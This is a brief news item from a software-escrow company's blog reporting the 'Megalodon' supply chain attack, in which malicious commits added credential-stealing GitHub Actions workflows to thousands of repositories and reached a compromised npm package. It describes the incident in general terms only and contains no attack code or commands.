Over 5,500 GitHub Repositories Hit by 'Megalodon' Supply Chain Attack

Massive GitHub attack infects 5,500+ repositories with malware, stealing sensitive data via rogue workflows in a supply chain breach.

By Content Team

May 25, 2026

ON THIS PAGE

Share

---

ON THIS PAGE

Want more insights like this?

Subscribe to our newsletter to get the latest software protection strategies delivered to your inbox.

By submitting your email, you consent to Codekeeper contacting you and agree to our privacy policy.

More than 5,500 GitHub repositories were infected with malware on May 18, 2026, in a supply chain attack called Megalodon. Attackers pushed 5,718 malicious commits across a six-hour window using two email addresses, injecting rogue GitHub Actions workflows designed to steal credentials, AWS keys, SSH private keys, API tokens, and dozens of other secrets from CI environments.

The attack was discovered after compromised versions of the Tiledesk npm package were published May 19–21. The maintainer unknowingly published from a poisoned source — the attacker never touched the npm account, only the GitHub repo. A dormant backdoor was also planted, triggerable later via the GitHub API using stolen tokens.

Source: SecurityWeek

Share this article

Have questions about protecting your software?

Our escrow experts are standing by to help.

Book a free demo

YOU MAY ALSO LIKE

Hackers Exploit Critical Quest KACE Flaw to Take Over Management Systems

Mar 21, 2026

Iranian Hackers Target US Medical Company in Cyber Retaliation

Mar 18, 2026

US Investigates Claims Meta Can Read Encrypted WhatsApp Messages

Feb 1, 2026

Under Armour Investigates Data Breach Affecting 72 Million Email Addresses

Jan 23, 2026